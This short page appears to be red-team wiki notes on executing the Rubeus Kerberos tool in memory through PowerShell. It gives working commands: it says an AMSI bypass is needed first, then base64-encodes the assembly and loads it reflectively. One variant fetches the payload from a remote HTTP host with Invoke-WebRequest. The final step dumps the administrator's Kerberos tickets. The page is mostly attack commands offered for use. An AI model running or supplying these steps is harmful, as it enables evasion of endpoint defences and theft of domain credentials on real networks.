.NET Execute Assembly

Firstly need amsi bypass

Running Rubeus Through PowerShell

If you want to run Rubeus in-memory through a PowerShell wrapper, first compile the Rubeus and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Rubeus.exe")) | Out-File -Encoding ASCII C:\Temp\rubeus.txt

Or read base64 from file

$content = [IO.File]::ReadAllText(".\test.txt")

Rubeus can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Rubeus assembly string):

$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

OR host base64 txt

$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String((Invoke-WebRequest -Uri http://192.168.5.52:7777/rubeus.txt -UseBasicParsing).Content))

The Main() method and any arguments can then be invoked as follows:

[Rubeus.Program]::Main("dump /user:administrator".Split())

PreviousFirewallNextDefender

Last updated